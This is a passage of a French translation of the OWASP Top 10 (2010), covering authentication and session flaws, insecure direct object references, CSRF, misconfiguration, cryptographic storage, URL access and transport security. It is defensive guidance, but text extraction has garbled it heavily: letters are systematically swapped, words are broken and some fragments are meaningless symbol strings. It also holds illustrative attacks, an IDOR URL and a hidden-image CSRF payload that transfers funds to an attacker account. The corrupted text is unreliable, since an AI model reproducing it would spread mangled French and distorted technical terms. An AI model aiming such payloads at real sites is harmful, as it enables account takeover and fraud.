un uullsaLeur auLhenue souhalLe recommander une ore a
ses amls. ll leur envole le llen par e-mall, sans savolr qu'll y
lncluL l'lu de sesslon. Cuand les amls cllquenL le llen, lls
recuperenL sa sesslon, alnsl que ses donnees de palemenL.
Scenarlo 2: un slLe sur lequel l'explrauon des sesslons n'esL
pas correcLemenL appllquee. un uullsaLeur s'y auLhenue
depuls un ordlnaLeur publlc, puls ferme le navlgaLeur avanL de
s'en aller. une heure apres, un auaquanL relance le navlgaLeur
eL accede a la sesslon resLee ouverLe.
Scenarlo 3: un auaquanL exLerne, ou lnLerne, obuenL l'acces
a la base de donnees des moLs de passes. Ces dernlers ne
sonL pas chlres, exposanL alnsl Lous les uullsaLeurs.
Su|s-[e vu|nrab|e?
Les ldenuanLs des uullsaLeurs eL les lu de sesslon dolvenL
Lre proLeges en prlorlLe.
1. Les ldenuanLs sonL lls sLockes au moyen de foncuons
crypLographlques de chlremenL ou hachage (volr A7)
2. euL-on devlner/modler des ldenuanLs vla la gesuon des
compLes (ex.: creauon de compLe, lu de sesslon falble,
changemenL/recuperauon de moL de passe)
3. L'lu de sesslon apparalL-ll dans l'u8L
4. L'lu de sesslon esL-ll expose aux $'$$2*# 3.")*#
. L'lu de sesslon explre-L-ll euL-on se deconnecLer
6. L'lu de sesslon esL-ll regenere apres l'auLhenucauon
7. Les ldenuanLs sonL-lls Lransmls de faon securlsee
ConsulLer l'ASvS aux chaplLres v2, v3 pour plus de deLalls.
kfrences
CWAS
our une llsLe deLalllee des recommandauons eL problemes a
evlLer, consulLer les exlgences du gulde ASvS aux chaplLres v2
(AuLhenucauon) eL v2 (Sesslons).
CWAS AuLhenucauon CheaL SheeL
LSAl AuLhenucaLor Al
LSAl user Al
CWAS uevelopmenL Culde: ChapLer on AuLhenucauon
CWAS 1esung Culde: ChapLer on AuLhenucauon
Autres rfrences
CWL LnLry 287 on lmproper AuLhenucauon
Comment empcher ceue auaque?
La recommandauon prlnclpale esL de meure les elemenLs
sulvanLs a dlsposluon des developpeurs:
1. Un ensemb|e un|que de contr|es desnns |a gesnon
des sess|ons et des authennhcanons. ue Lels conLrles
s'eorceronL de:
a) sausfalre aux exlgences denles dans Appllcauon
SecurlLy verlcauon SLandard (ASvS) , aux secuons
v2 (auLhenucauon) eL v3 (sesslons).
b) exposer une lnLerface unlque aux developpeurs. Les
llbralrles LSAl AuLhenucaLor and user Als peuvenL
servlr de modele, volre, de reference.
2. Meure en uvre des mesures emcaces pour evlLer les
fallles SS, paruculleremenL uullsees pour voler les lu de
sesslon. volr A2.
V|o|anon de Gesnon
d'authennhcanon et de Sess|on
A3
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Lxp|o|tanon
IACILL
rva|ence
kLANDU
Dtecnon
IACILL
Impact
MCDLkL
__________
Conslderer les
Lypologles
d'uullsaLeurs du
sysLeme. Les
uullsaLeurs sonL-lls
soumls a des
resLrlcuons d'acces
selon les Lypes de
donnees accesslbles
dans l'appllcauon
L'auaquanL ayanL
acces au sysLeme
remplace la valeur
d'un parameLre
ldenuanL une
ressource par une
auLre valeur
exlsLanLe.
Aura-L-ll acces a
ceue ressource
Les appllcauons lncluenL souvenL les
ldenuanLs Lechnlques des ressources (lu,
cle, eLc.) au seln des pages web generees.
Lorsque le conLrle d'acces n'esL pas
eecLue a chaque fols que l'uullsaLeur
demande l ' acces a une ressource
parucullere, ll peuL en resulLer des
references dlrecLes non securlsees. Les
LesLeurs peuvenL facllemenL evaluer la
presence de ceue vulnerablllLe vla les
LesLs de securlLe ou l'analyse de code.
L e s r e s s o u r c e s
ldenuees par le
p a r a m e L r e
vul nerabl e s onL
compromlses. Seuls
des l denuanL s
ous ou aleaLolres
(ex: Lable d'lndex,
Culu) empchenL
l ' a u a q u a n L d e
devlner les valeurs.
Conslderer la valeur
marchande des
donnees exposees.
Conslderer
egalemenL l'lmpacL
d'une dlvulgauon de
la vulnerablllLe.
Lxemp|e de scnar|o d'auaque
L'appllcauon uullse un parameLre non vallde pour consLrulre
la requLe SCL d'acces aux lnformauons d'un compLe: :
Str|ng query = "SLLLC1 * IkCM accts WnLkL account = ?",
reparedStatement pstmt =
connecnon.prepareStatement(query , . ),
pstmt.setStr|ng( 1, request.getparameter("acct")),
kesu|tSet resu|ts = pstmt.executeuery( ),
Sl l'auaquanL remplace slmplemenL la valeur du parameLre
accL' dans son navlgaLeur par une auLre valeur, l'appllcauon
lul reLournera les deLalls d'un compLe poLenuellemenL non
auLorlse:
hup:]]examp|e.com]app]accountInfo?acct=notmyacct
Su|s-[e vu|nrab|e?
Le mellleur moyen de verler la presence de references
dlrecLes non securlsees esL de verler que chaque parameLre
referenceur dlspose de defenses approprlees. Conslderer:
1. our les references d|rectes a des ressources protges,
l'appllcauon dolL s'assurer que l'uullsaLeur esL auLorlse a
acceder a la ressource preclsemenL demandee.
2. Sl la reference esL |nd|recte, l'assoclauon vers la reference
dlrecLe dolL Lre sLrlcLemenL llmlLee aux seules valeurs
auLorlsees pour l'uullsaLeur.
La revue du code de l'appllcauon peuL rapldemenL ldenuer
une lmplemenLauon sre de l'une ou l'auLre des approches.
Le LesL de securlLe esL egalemenL emcace dans la recherche
de references dlrecLes vulnerables. Les ouuls auLomauses ne
sonL generalemenL pas en mesure de reperer ceue falblesse
dans la mesure o lls ne peuvenL qualler la naLure proLegee
ou non d'une ressource.
kfrences
CWAS
CWAS 1op 10-2007 on lnsecure ulr Cb[ecL 8eferences
LSAl Access 8eference Map Al
LSAl Access ConLrol Al (Vo|r |sAuthor|zedIorData(),
|sAuthor|zedIorI||e(), |sAuthor|zedIorIuncnon() )
our une llsLe de conLrles addluonnels, consulLer le gulde
ASvS (v4 - 8equlremenLs area for Access ConLrol)
Autres rfrences
CWL LnLry 63 on lnsecure ulrecL Cb[ecL 8eferences
CWL LnLry 22 on aLh 1raversal (exemp|e d'auaque sur des
rfrences d|rectes non scur|ses)
Comment empcher ceue auaque?
ueux approches exlsLenL pour empcher la presence de
references dlrecLes non securlsees (ex: noms de chlers,
ldenuanLs de ressources):
1. Imp|menter des rfrences |nd|rectes, par un||sateur ou
par sess|on. Au lleu d'exposer l'ldenuanL de la base de
donnees (lu) dans la page web, le developpeur va proposer
une llsLe lndexee de 1 a 6. L'uullsaLeur cholslL l'elemenL selon
ceue llsLe eL l'appllcauon eecLuera l'assoclauon vers la
reference dlrecLe cLe serveur. La llbralrle LSAl de l'CWAS
propose des meLhodes faclllLanL la mlse en uvre de Lelles
llsLes, sequencees ou aleaLolres.
2. Contr|er |'accs. our chaque LenLauve d'acces a une
ressource selon sa reference dlrecLe, l'appllcauon eecLuera
un conLrle d'acces compleL an de s'assurer que l'uullsaLeur
peuL acceder a la ressource.
kfrences d|rectes
non scur|ses un ob[et
A4
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
.
__________
Iac|||t
MCLNNL
rva|ence
kLANDUL
Dtectab|||t
IACILL
Impact
MCLN
__________
Conslderez un
lndlvldu pouvanL
de[ouer vos
uullsaLeurs en
soumeuanL une
requLe a voLre slLe.
n'lmporLe quel slLe
ou auLre source
P1ML que vos
uullsaLeurs
accedenL pourralL le
falre.
L'auaquanL forge
une requLe P11
eL amene une
vlcume a la
soumeure vla une
ballse d'lmage, SS,
ou de nombreuses
auLres Lechnlques.
Sl l'uullsaLeur esL
auLhenue ,
l'auaque esL un
succes.
CS8l prends avanLage des appllcauons
web qul permeuenL aux auaquanLs de
pr edl r e l es deL al l s d' une acuon
parucullere. arce que les fureLeurs
envolenL auLomauquemenL des donnees
de sesslons Lel des cookles, les auaquanLs
peuvenL creer des pages web mallcleuses
qul generenL des requLes forgees qul ne
sonL pas dlsunguables des leglumes. La
deLecuon des CS8l esL assez faclle vla un
LesL de peneLrauon ou analyse de code.
Les auaquanLs
peuvenL falre
changer aux
vlcumes n'lmporLe
quelle donnee donL
la vlcume a le drolL
de modler, ou
execuLer n'lmporLe
quelle acuon donL la
vlcume esL
auLorlsee.
Conslderez la valeur
corporauve de la
donnee aecLee ou
sa foncuon.
lmaglnez ne pas
Lre convalncu sl
l'uullsaLeur avalL
l'lnLenuon
d'eecLuer l'acuon.
Lxemp|e de scnar|o d'auaque
L'appllcauon permeL a un uullsaLeur de soumeure un
changemenL d'eLaL qul ne conuenL aucun secreL. Lxemple:
hup:]]examp|e.com]app]transferIunds?amount=1S00
&desnnanonAccount=4673243243
uonc, l'auaquanL consLrulL une requLe qul Lransferera un
monLanL d'argenL de la vlcume vers son propre compLe. ll
lmbrlquera ensulLe ceue auaque sous une ballse d'lmage ou
un ll8AML, pour nalemenL les placer dans dlerenLs slLes
sous son conLrle.
<|mg src="hup:]]examp|e.com]app]transferIunds?
amount=1S00&desnnanonAccount=AuackerAccount
w|dth="0" he|ght="0" ]>
Sl la vlcume vlslLe n'lmporLe quel de ces slLes pendanL qu'elle
esL auLhenuee a example.com, les requLes forgees vonL
lnclure les lnformauons de la sesslon de l'uullsaLeur, eL la
requLe sera auLorlsee par lnadverLance.
Su|s-[e vu|nrab|e?
La faon la plus slmple de verler sl une appllcauon esL
vulnerable esL de volr sl chaque llen eL forme conuennenL un
[eLon non prevlslble pour chaque uullsaLeur. Sans cela, les
auaquanLs peuvenL forger une requLe mallcleuse. Clbler les
llens eL formes qul lnvoquenL des foncuons de changemenL
d'eLaLs, car elles sonL la clble premlere de CS8l.
vous devrlez verler les Lransacuons a plusleurs eLapes, car
elle ne sonL pas lnLrlnsequemenL lmmune. Les auaquanLs
peuvenL facllemenL forger une serle de requLes en uullsanL
des ballses muluples ou posslblemenL le !avaScrlpL.
noLez que les cookles de sesslons, adresses l sources, eL
auLres lnformauons qul sonL auLomauquemenL envoyees par
le fureLeur ne compLenL pas, car l'lnformauon esL aussl
lncluse dans les requLes forgees.
L'ouul CWAS CS8l 1esLer peuL alder a generer des cas de
LesLs pour demonLrer le danger du CS8l.
kfrences
CWAS
CWAS CS8l Arucle
CWAS CS8l revenuon CheaL SheeL
CWAS CS8lCuard - CS8l uefense 1ool
LSAl ro[ecL Pome age
LSAl P11uullues Class wlLh AnuCS8l 1okens
CWAS 1esung Culde: ChapLer on CS8l 1esung
CWAS CS8l1esLer - CS8l 1esung 1ool
Lxterne
CWL LnLry 32 on CS8l
Comment empcher ceue auaque?
revenlr le CS8l requlerL l'lncluslon d'un [eLon non prevlslble
dans le conLenu ou u8L de chaque requLe P11. Ces [eLons
devralenL au mlnlmum Lre unlques par sesslon uullsaLeur,
mals pourralenL aussl Lre unlque par requLe.
1. L'opuon prlvlleglee esL d'lnclure le [eLon unlque dans un
champ cache. Cecl lmpllque que la valeur solL envoyee dans le
conLenu de la requLe P11, empchanL son lncluslon dans le
u8L, qul esL su[eL a l'exposluon.
2. Le [eLon unlque peuL aussl Lre lnclue dans le u8L lul-
mme, ou dans un parameLre. ar conLre, ceL emplacemenL
courL le rlsque que le u8L sera expose a un auaquanL, donc
de compromeure le [eLon secreL.
Le CS8l Cuard de l'CWAS peuL Lre uullse pour
auLomauquemenL lnclure ces [eLons dans vos appllcauons
!ava LL, .nL1, ou P. L'LSAl de l'CWAS lncluL un generaLeur
de [eLon eL un valldeur que les developpeurs peuvenL uullser
pour proLeger leurs Lransacuons.
Ia|s|hcanon de requte
|nters|te (CSkI)
AS
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Iac|||t
SIMLL
rva|ence
CCMMUNL
Dtectab|||t
IACILL
Impact
MCLN
__________
Conslderez des
auaquanLs exLernes
anonymes, ou des
uullsaLeurs
leglumes, LenLanL
de compromeure le
sysLeme.
Conslderez aussl
des employes
lnLernes voulanL
degulser leur
acuons.
AuaquanL accedanL
a des compLes par
defauL, pages non
uullsees,
vulnerablllLes non
corrlgees, chlers eL
reperLolres non
corrlges, eLc. an
d'obLenlr des acces
non auLorlses ou
connalssances du
sysLeme.
La mauvalse congurauon de securlLe
peuL se manlfesLer a n'lmporLe quel
nlveau de couche appllcauve, lncluanL la
plaLeforme, serveur web eL d'appllcauon,
lramework, eL code mal son. Les
developpeurs eL admlnlsLraLeurs reseau
onL besoln de Lravalller de concerL an de
s'assurer que LouLes les couches sonL
congurees correcLemenL. Les scanners
auLonomes sonL uules pour deLecLer les
rusunes manquanLes, problemes de
congurauon, compLe par defauL, servlces
lnuules, eLc.
Ceue vulnerablllLe
donne
frequemmenL aux
auaquanLs des
acces non auLorlses
a des sysLemes ou a
des foncuonnallLes.
CccaslonnellemenL,
ces vulnerablllLes
resulLenL en une
compromlsslon
compleLe du
sysLeme.
Le sysLeme peuL
Lre compromls
sans le savolr.
1ouLes vos donnees
peuvenL Lre volees
ou modlees
lenLemenL dans le
Lemps.
Les coLs de
recouvremenL
peuvenL Lre
lmporLanLs.
Lxemp|e de scnar|o d'auaque
Scenarlo 1: voLre appllcauon esL basee sur un lramework Lel
SLruLs ou Sprlng. une fallle SS esL Lrouvee dans une
composanLe du lramework uullse. une mlse a [our esL
deployee an de reparer la fallle, mals vous ne l'lnsLallez pas.
Les auaquanLs peuvenL Lrouver eL explolLer ces fallles dans
voLre appllcauon.
Scenarlo 2: La console de gesuon appllcauve esL
auLomauquemenL lnsLallee eL non desacuvee. Les compLes
par defauL sonL lnchanges. L'auaquanL decouvre la console,
uullse le compLe par defauL, eL prend le conLrle.
Scenarlo 3: La llsLage de reperLolre esL acuf sur voLre
serveur. L'auaquanL le decouvre eL Lelecharge vos classes [ava
compllees, qu'll renversenL pour obLenlr voLre code. ll volL
alors une fallle de conLrle d'acces dans l'appllcauon.
Scenarlo 4: La congurauon du serveur appllcauf permeL aux
eLaLs de plle d'Lre amchees aux uullsaLeurs. Les auaquanLs
adorenL les lnformauons fournles par les erreurs.
Su|s-[e vu|nrab|e?
Avez-vous eecLue le durclssemenL de securlLe approprle
1. Avolr un processus qul malnuenL vos loglclels a nlveau (CS,
serveur Web/App, 8u, appllcauons) eL toutes |es ||bra|r|es de
code?
2. 1ouL ce qul esL lnuule esL desacuve, supprlme ou non
lnsLalle (ex.: porLs, servlces, pages, compLes, prlvlleges)
3. Les moLs de passe par defauL sonL changes ou desacuves
4. La gesuon des erreurs esL conguree pour prevenlr
l'amchage d'eLaL de la plle eL auLre d'Lre vlslbles
. La congurauon de securlLe des lramework de
developpemenL (ex.: SLruLs, Sprlng, AS.nL1) eL llbralres sonL
eLudlees eL congurees correcLemenL
6. un processus concerLe eL repeLable esL requls pour
developper eL malnLenlr une congurauon de securlLe
appllcauve adequaLe.
kfrences
CWAS
CWAS uevelopmenL Culde: ChapLer on Congurauon
CWAS Code 8evlew Culde: ChapLer on Lrror Pandllng
CWAS 1esung Culde: Congurauon ManagemenL
CWAS 1esung Culde: 1esung for Lrror Codes
CWAS 1op 10 2004 - lnsecure Congurauon ManagemenL
lor addluonal requlremenLs ln Lhls area, see Lhe ASvS
requlremenLs area for SecurlLy Congurauon (v12).
Lxterne
C Magazlne Arucle on Web Server Pardenlng
CWL LnLry 2 on LnvlronmenLal SecurlLy llaws
ClS SecurlLy Congurauon Culdes/8enchmarks
Comment empcher ceue auaque?
La recommandauon prlmalre esL d'eLabllr ces requls:
1. un processus de durclssemenL repeLable a pour eeL
d'Lre raplde eL faclle de deployer un auLre envlronnemenL
securlLalre. uLv, CA, eL producuon devralenL Lre congures
ldenuquemenL. Ce processus devralL Lre auLomause an de
mlnlmlser les eorLs requls pour congurer un nouvel
envlronnemenL.
2. un processus pour se garder au couranL eL pour deployer
les nouvelles mlse-a-[our eL rusunes loglclelles dans un Lemps
opporLun, dans chaque envlronnemenL. Cecl lncluL le code de
llbralrles, frequemmenL negllge.
3. une sollde archlLecLure d'appllcauon qul apporLe une
bonne separauon eL securlLe enLre les composanLes.
4. LecLuer des balayages de securlLe eL des audlLs
perlodlques alde a deLecLer les fuLures mauvalses
congurauon.
Mauva|se conhguranon
Scur|t
A6
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Iac|||t
DIIIICILL
rva|ence
NCN CCMMUN
Dtectab|||t
DIIIICILL
Impact
SLVLkL
__________
Conslderez les
uullsaLeurs de voLre
sysLeme.
AlmeralenL-lls
obLenlr l'acces a des
donnees proLegees
donL lls n'onL pas
acces Cu'en esL-ll
des admlnlsLraLeurs
lnLernes
Les auaquanLs ne
brlsenL
normalemenL pas la
crypLographle. lls
brlsenL auLre chose,
comme Lrouver des
cles, des donnees
en clalr, ou des
donnees vla des
chemlns qul
decrypLenL
auLomauquemenL.
La fallle la plus commune esL de ne pas
chlrer les donnees senslbles. Lorsque le
crypLage esL employe, la generauon de
cles eL sLockage non securlLalre, la non-
r oL auon de c l es , eL l ' uul l s auon
d'al gor l L hme fal bl e esL commun.
L'uullsauon de hash falble ou sans
conslsLance pour proLeger les moL de
passe l'esL aussl. Les auaquanLs exLernes
onL de la dlmculLe a deLecLer ces fallles d
a l'acces llmlLe. lls dolvenL explolLer auLre
chose en premler pour obLenlr l'acces.
L'echec compromeL
regulleremenL les
donnes devanL Lre
crypLees.
1yplquemenL les
lnformauons
conuennenL des
donnees senslbles
Lel des dosslers de
sanLe, ldenuLes,
carLes de credlL eLc.
Conslderez la valeur
buslness des
donnees perdues eL
l'lmpacL sur voLre
repuLauon. Cuelle
esL voLre
responsablllLe legale
sl des donnees sonL
exposees
Lxemp|e de scnar|o d'auaque
Scenarlo 1: une appllcauon chlre des carLes de credlL dans
une base de donnees. La 8u esL conguree pour
auLomauquemenL dechlrer les requLes sur la colonne des
carLes, permeuanL une fallle d'ln[ecuon SCL an de recuperer
Lous les numeros en clalr. Le sysLeme devralL avolr eLe
congure an de ne permeure qu'aux appllcauons lnLernes de
les dechlrer, eL non l'appllcauon web publlque.
Scenarlo 2: une cople de sauvegarde conuenL des dosslers
de sanLe crypLees, mals la cle de crypLage esL sur la cople de
sauvegarde. La cople n'esL [amals arrlvee au cenLre de
sauvegarde.
Scenarlo 3: 8ase de donnees de moLs de passe uullsanL des
hash sans conslsLance pour sLocker les Md uullsaLeurs. une
fallle de LelechargemenL de chler permeL a l'auaquanL
d'obLenlr le chler de Md. 1ous les hash non approprles
peuvenL Lre auaques par force bruLe en 4 semalnes, alors
des hash approprles auralenL prlL 3000 ans.
Su|s-[e vu|nrab|e?
La premlere chose a deLermlner esL quelle donnee esL assez
senslble pour demander un chlremenL. ar exemple, les
moLs de passe, carLes de credlL eL lnformauons personnelles
devralenL Lre chlres. our LouLes ces donnees, s'assurer de:
1. Chlrer parLouL o les donnees sonL sLockees a long
Lerme, paruculleremenL les sauvegardes de ces donnees.
2. Seuls les uullsaLeurs auLorlses peuvenL acceder la cople
decrypLee des donnees (e.g. conLrle d'acces - volr A4 eL A8).
3. un algorlLhme sLandard de chlremenL forL esL uullse.
4. une cle forLe esL generee, proLegee d'un acces non
auLorlse, eL les changemenLs de cles sonL planles.
ue plus, pour une llsLe plus compleLe de problemes a evlLer,
volr le ASvS requlremenLs on CrypLography (v7)
kfrences
CWAS
our une llsLe plus compleLe de prerequls eL de problemes a
evlLer dans ce domalne, volr le ASvS requlremenLs on
CrypLography (v7).
CWAS 1op 10-2007 on lnsecure CrypLographlc SLorage
LSAl LncrypLor Al
CWAS uevelopmenL Culde: ChapLer on CrypLography
CWAS Code 8evlew Culde: ChapLer on CrypLography
Lxterne
CWL LnLry 310 on CrypLographlc lssues
CWL LnLry 312 on ClearLexL SLorage of Sensluve
lnformauon
CWL LnLry 326 on Weak Lncrypuon
Comment empcher ceue auaque?
Le perlple de la crypLographle non securlLalre esL blen au dela
de la porLee de ce 1op 10. our LouLes les donnees merlLanL
un crypLage, falre au mlnlmum LouL ce qul sulL,:
1. ConslderanL les menaces desquelles vous prevoyez de
proLeger vos donnees (e.g. auaquanL lnLerne, uullsaLeur
exLerne), assurez-vous de chlrer ces donnees de Lelle
manlere a vous proLeger de ces menaces.
2. S'assurer que les sauvegardes exLernes sonL chlrees, mals
que les cles sonL gerees eL sauvegardees separemenL.
3. S'assurer que les algorlLhmes sLandards eL cles forLes sonL
uullses, eL que la gesuon des cles esL en place.
4. S'assurer que les moLs de passe sonL haches avec un
algorlLhme sLandard forL eL approprle esL uullse.
. S'assurer que les cles eL moLs de passe sonL proLeges des
acces non auLorlses.
Stockage Cryptograph|que
non Scur|s
A7
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Lxp|o|tab|||t
IACILL
rva|ence
kAkL
Dtecnon
MCLNNL
Impact
MCDk
__________
n'lmporLe qul doLe d'un
a c c e s r e s e a u p e u L
envoyer une requLe a
l'appllcauon. LsL-ce qu'un
uullsaLeur anonyme peuL
acceder a une page
prlvee ou esL-ce qu'un
slmple uullsaLeur peuL
acceder a une page a
acces prlvllegle
L'auaquanL, uullsaLeur
auLorlse du sysLeme,
change slmplemenL l'u8L
pour une page a acces
prlvllegle. Sl l'acces esL
auLorlse, les uullsaLeur
a n o ny me s p e u v e nL
acceder a des pages
prlvees non proLegees.
Les appl l cauon ne proLegenL pas Lou[ ours
correcLemenL les requLes. arfols la proLecuon des
u8Ls esL geree par l ' l nLermedl al re de l a
congurauon, eL le sysLeme esL mal congure. arfols
les developpeurs dolvenL lnclure leur propre
verlcauon dans leur code, mals lls peuvenL oubller.
La deLecuon esL faclle. La parue la plus dlmclle
conslsLe a deLermlner les pages (u8Ls) exlsLanLes
poLenuellemenL vulnerables.
u e L e l l e s f a l l l e s
p e r m e u e n L a u n
auaquanL d'acceder a
des foncuonnallLes non
auLorlsees. Les foncuons
d'admlnlsLrauon sonL les
clbles cles de ce Lype
d'auaque.
Consl derez l a val eur
meuer des foncuons
exposees eL des donnees
LralLees.
euL egalemenL lmpacLer
l a r e puL auon s l l a
v ul ner abl l l L e a eL e
rendue publlque.
Lxemp|e de scnar|o d'auaque
L'auaquanL force slmplemenL la navlgauon d'u8Ls clbles.
Conslderons les u8Ls sulvanLes censees LouLes deux exlger une
auLhenucauon. ues drolLs AdmlnlsLraLeur sonL egalemenL requls
pour acceder a la page admln_geLapplnfo .
hup:]]examp|e.com]app]getappInfo
hup:]]examp|e.com]app]adm|n_getappInfo
Sl l'auaquanL n'esL pas auLhenue eL que l'acces a l'une des pages
esL accorde, alors un acces non auLorlse esL permls. Sl un uullsaLeur
non admlnlsLraLeur auLhenue esL auLorlse a acceder a la page
admln_geLapplnfo , ll exlsLe une fallle pouvanL condulre l'auaquanL
a acceder a d'auLres pages reservees aux admlnlsLraLeurs non
proLegees.
ue Lelles fallles sonL frequemmenL lnLrodulLes lorsque des llens eL
des bouLons sonL slmplemenL masques aux uullsaLeurs non
auLorlses, l'appllcauon ne proLege pas les pages clblees.
Su|s-[e vu|nrab|e ?
La mellleure faon de savolr sl une appllcauon ne resLrelnL pas
correcLemenL l'acces aux u8Ls esL de verler chaque page. ll
convlenL de denlr pour chaque page sl elle esL censee Lre publlque
ou prlvee. our une page prlvee :
1. La page requlerL-elle une auLhenucauon
2. La page esL-elle censee Lre accesslble a LouL uullsaLeur
auLhenue Sl non, esL-ce qu'une verlcauon d'auLorlsauon esL
eecLuee lors de l'acces a ceue page
ues mecanlsmes exLernes de securlLe fournlssenL frequemmenL des
verlcauons d'auLhenucauon eL d'auLorlsauon. verlez leur
congurauon pour chaque page. Sl une proLecuon au nlveau du code
esL uullsee, verlez que ceue proLecuon esL en place pour chaque
page demandee. ues LesLs de peneLrauons peuvenL egalemenL
verler sl une proLecuon adequaLe esL en place.
kfrences
CWAS
CWAS 1op 10-2007 on lallure Lo 8esLrlcL u8L Access
LSAl Access ConLrol Al
CWAS uevelopmenL Culde: ChapLer on AuLhorlzauon
CWAS 1esung Culde: 1esung for aLh 1raversal
CWAS Arucle on lorced 8rowslng
our d'auLres exlgences de conLrle d'acces, volr ASvS requlremenLs
area for Access ConLrol (v4).
Lxternes
CWL LnLry 28 on lmproper Access ConLrol (AuLhorlzauon)
Comment empcher ceue auaque?
revenlr des acces u8L non auLorlses requlerL la selecuon d'une
approche exlgeanL une auLhenucauon eL une auLorlsauon
approprlees pour chaque page. SouvenL, une Lelle proLecuon esL
assuree par un ou plusleurs composanLs exLernes. lndependammenL
du ou des mecanlsmes, LouLes les exlgences sulvanLes sonL
recommandees :
1. Les polluque d'auLhenucauon eL d'auLorlsauon dolvenL Lre
basee sur les rles, an de mlnlmlser l'eorL necessalre lors de leur
malnLenance.
2. Les polluques dolvenL Lre hauLemenL congurables, an de
mlnlmlser les aspecLs codes en dur.
3. Le mecanlsme d'appllcauon des polluques dolL refuser LouL acces
par defauL eL exlger des drolLs speclques pour l'acces a chaque
page.
4. Sl la page esL lmpllquee dans un workow, assurez-vous que
LouLes les condluons sonL reunles pour permeure l'acces.
Manque de kestr|cnon
d'Accs UkL
A8
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Lxp|o|tab|||t
DIIIICILL
rva|ence
CCMMUN
Dtecnon
IACILL
Impact
MCDk
__________
1ouLe personne pouvanL
survelller le Lrac reseau
des uul l s aL eur s . S l
l ' appl l cauon esL sur
lnLerneL, LouLe personne
sachanL commenL les
uullsaLeurs accedenL a
l'appllcauon. Sans oubller
les connecuons back-
end.
Survelller le Lrac reseau
des uul l s aL eur s esL
generalemenL dlmclle,
mals peuL parfols Lre
facl l e. La prl ncl pal e
dlmculLe reslde dans le
sulvl du Lrac adequaL du
r es ea u l or s que l es
uullsaLeurs accedenL au
slLe vulnerable.
lrequemmenL les appllcauons ne proLegenL pas le
Lrac reseau. Llles peuvenL uullser SSL/1LS duranL
l'auLhenucauon, mals exposer par allleurs des
donnees eL ldenuanLs de sesslon. ues cerucaLs
explres ou mal congures peuvenL egalemenL Lre
uullses.
ueLecLer des fallles baslque esL faclle. ll sumL
d'observer le Lrac reseau du slLe. Les fallles plus
subules requlerenL une lnspecuon de l'archlLecLure
de l'appllcauon eL de la congurauon du serveur.
ue Lelles fallles exposenL
des donnees uullsaLeurs
eL peuvenL condulre a
leur usurpauon. Sl un
compLe AdmlnlsLraLeur
esL compromls,
l'ensemble du slLe peuL
Lre lmpacLe. une
mauvalse congurauon
de SSL peuL aussl faclllLer
des auaques (phlshlng,
man ln Lhe mlddle, eLc.).
Conslderez la valeur
meuer des donnees
exposees sur le canal de
communlcauon en
foncuon des besolns de
condenuallLe eL
d'lnLegrlLe eL de la
necesslLe d'auLhenuer
les deux parues.
Lxemp|e de scnar|os d'auaque
Scenarlo 1 : un slLe n'uullse pas SSL pour les pages necesslLanL une
auLhenucauon. L'auaquanL survellle slmplemenL le Lrac reseau
(comme un reseau sans l ouverL ou un reseau cble) eL observe un
cookle de sesslon d'un uullsaLeur auLhenue. L'auaquanL peuL alors
reuullser ce cookle an d'obLenlr la sesslon de l'uullsaLeur.
Scenarlo 2 : un slLe possedanL un cerucaL SSL mal congure qul
provoque des averussemenLs dans le navlgaLeur. Les uullsaLeurs sonL
conLralnLs d'accepLer ces averussemenLs pour uullser le slLe, rendanL
alnsl de Lels averussemenLs banaux. Les auaques de Lype phlshlng
uullsanL des slLes sosles provoquenL egalemenL de Lels
averussemenLs. Les uullsaLeurs hablLues a accepLer des
averussemenLs, les accepLenL eL fournlssenL alnsl des moLs de passe
ou d'auLres donnees personnelles.
Scenarlo 3 : un slLe uullse slmplemenL la norme Cu8C/!u8C pour la
connexlon a la base de donnees, sans reallser que LouL le Lrac esL
en clalr.
Su|s-[e vu|nrab|e ?
La mellleure faon de savolr sl une appllcauon ne benecle pas d'une
proLecuon sumsanLe de la couche 1ransporL conslsLe a verler que :
1. SSL esL uullse pour proLeger LouL Lrac d'auLhenucauon.
2. SSL esL uullse pour LouLes les ressources sur LouLes les pages eL
servlces prlves an de proLeger LouLes les donnees eL [eLons de
sesslon echanges. L'uullsauon de Mlxed SSL sur une page devralL
Lre evlLee car les averussemenLs uullsaLeur provoques peuvenL
exposer les ldenuanLs de sesslon de l'uullsaLeur.
3. Seuls des algorlLhmes forLs sonL prls en charge.
4. 1ous les cookles de sesslon speclenL un ag securlse ($'(-+'
7"5) an que le navlgaLeur ne les Lransmeue pas en clalr.
. Le cerucaL du serveur esL leglume eL correcLemenL congure.
Cela lncluL qu'll solL emls par un emeueur auLorlse, ne solL pas
explre, ne solL pas revoque eL corresponde a l'ensemble des
domalnes uullses par le slLe.
kfrences
CWAS
our un ensemble plus compleL d'exlgences eL des problemes a
evlLer, volr ASvS requlremenLs on Communlcauons SecurlLy (v10).
CWAS 1ransporL Layer roLecuon CheaL SheeL
CWAS 1op 10-2007 on lnsecure Communlcauons
CWAS uevelopmenL Culde: ChapLer on CrypLography
CWAS 1esung Culde: ChapLer on SSL/1LS 1esung
Lxternes
CWL LnLry 31 on ClearLexL 1ransmlsslon of Sensluve lnformauon
SSL Labs Server 1esL
uenluon of llS 140-2 CrypLographlc SLandard
Comment empcher ceue auaque?
Assurer une bonne proLecuon de la couche 1ransporL peuL lnuer
sur la concepuon enuere du slLe. ll esL plus faclle d'exlger SSL pour
l'ensemble du slLe. our des ralsons de performances, cerLalns slLes
n'uullsenL SSL que pour les pages prlvees. u'auLres, ne l'uullse que
pour les pages crluques, mals cela peuL exposer les ldenuanLs de
sesslon eL auLres donnees senslbles. Au mlnlmum, ll convlenL de :
1. Lxlger SSL pour LouLes les pages senslbles. Les requLes non SSL
sur ces pages dolvenL Lre redlrlgees vers la page SSL.
2. Specler le drapeau securlse ($'(-+' 7"5) sur Lous les cookles
senslbles.
3. Congurer SSL de faon a n'uullser que des algorlLhmes forLs (ex :
respecLanL llS 140-2).
